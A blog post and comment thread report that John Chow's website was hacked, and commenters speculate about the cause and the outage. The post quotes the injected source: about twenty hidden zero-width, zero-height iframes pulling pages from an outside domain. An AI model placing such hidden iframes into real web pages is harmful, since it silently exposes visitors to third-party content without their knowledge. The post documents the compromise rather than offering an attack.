While doing my morning Internet cruising I attempted to visit John Chow's How to make money on the Internet website and all I got was a blank page. After looking at the source I saw a much scarier picture:
[iframe src="http://www.siyamiozkan-mavideniz.org" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/canakkale/index.htm" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/gelibolu/index.htm" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/troia/index.htm" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/canakkale/gezi.htm" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/canakkale/savas.htm" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/canakkale/savason.htm" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/gelibolu/tarihce.htm" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/gelibolu/yerler.htm" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/gelibolu/unluleri.htm" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/gelibolu/gravur.htm" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/gelibolu/kronoloji.htm" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/troia/tarih.htm" frameborder="0" width="0" height="0">][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/troia/sehir.htm" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/forum2/" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/forum/" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/phpnuke_security.htm" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/cd.htm" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/cd1ayrinti.htm" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/remote_file_include_vulnerabilities.htm" frameborder="0" width="0" height="0"][/iframe]
[iframe src="http://www.siyamiozkan-mavideniz.org/forum2/memberlist.php" frameborder="0" width="0" height="0"][/iframe]
Looks like John has been hacked!
Which leads us to the next big question, was his server exploited or was his WordPress install exploited?
I can only hope that John uses a cron job to backup his databases.
I just noticed this as well. Tracking back to watch the story unfold~
And now its changed to page not available…
Hmm… very odd. I know http://www.stephenfung.net/ is on the same server as John’s and it’s doing the same thing. http://www.leochiang.com/ is doing it too.
Looks like a hack to me.
I suppose a server hack is good news to the rest of the WordPress users out there!
The Tech Zone is opperational. I recall a time in the past when John’s blog AND TTZ went down. Did he recently move them to different servers?I would consider emailing John about this but… If his site is down/hacked/redirected his email may be too.
Maybe I’ll call him on the phone? when I won a pen from him he sent his business card!
I’m sure he mentioned in a post recently that johnchow.com was hosted on ttz servers.
What time is it over in Canada? If it’s still early he may not know what’s going on.
Any time before 11am is early for a dot com mogul :)
Very true Matt. :)
I think I’m still using wordpress 2.0 eek..I tried updating, but I think I was doing something wrong. I’m not really worried of being hacked. But I guess I should knock on wood now.
Might be worth giving im a call although I dont believe the email server would have been effected.
I wonder if one of the 3 blogs on there wasnt updated. It will be interesting to find out how they got exploited.
It should be early morning there, 6-7′ish I would guess.
I gave him a call. He sounded VERY tired. Remember, he wakes up at noon on most days!
I take it he didn’t know about it?
No, he was probably thinking, “Who the hell is calling me this early in the morning???”
lol. He was probably thinking, “who the hell is calling me, what are you doing waking me up and what the hell do you want.”
hahaha…It’s def early for the root of all evil
His site is back up but it also very sloooooow right now.
completely down on my end after crawling along on a refresh.
Thanks for the heads up and comments on my blog Steve, much apreciated ;-)
Network Access Message: The page cannot be displayed
I was able to browse his site for about 5 minutes and now I just get a basic DNS error page.
Down for me too…been daown all day.
This is actually a good thing. Maybe all the blogs blogging about blogs making money will have to come up with an original thought today.
Perhaps!
I think they will all spend the day covering the fact that John got hacked.
I have already seen a bunch of blog posts about him begin hacked.
I’m surprised his site is back down again. It must have been a serious hit!
You know what? This is the second time I have been the first to blog about bad things happeneing to John. Last year I was the first to find out that he had been banned from Digg!
Does that make you the official John Chow stalker ;) Just kidding. LOL.
No, it just means I have amazing timing!
You can’t fool us Steve. :)
Rumour has it your desktop wallpaper is a picture of John. It’s just what I’ve heard. :)
I’ll bet he was still using version 2.1.1 of WordPress. That code looks exactly like what happened to me before I found out that 2.1.1 was hacked on the servers where WordPress was distributed.
Just checked Google’s cached version of his homepage, and he was running 2.1.3.
[...] very latest version of WordPress. It will be very interesting to see what ends up being the issue. HMTKSteve has the best running updates I’ve found so far. Related PostsAn Exception to the [...]
I was just getting a “page not found” earlier. What’s all the iframe stuff? Is that what JC was talking about a few days ago with his advertisements?
By using iframes with 0 width and 0 height the average internet user will not even notice them being there. This allows a hacker to set cookies on your machine and you wont even know it.
All I saw was a blank page and John’s favicon in my url bar. If I was not tech savvy I would have just thought his site crashed.
Latest News - John Chow Hacked Again….
John Chow has unfortunately been hit again by another Hack Attack. This is the second time in less than 3 weeks, the last time catching John on his travels in Toronto.
Once again, the only thing we can do is wish John good luck with getting his site up…
reality is the hard and difficult John Chow HACKED
I’m sure John will survive.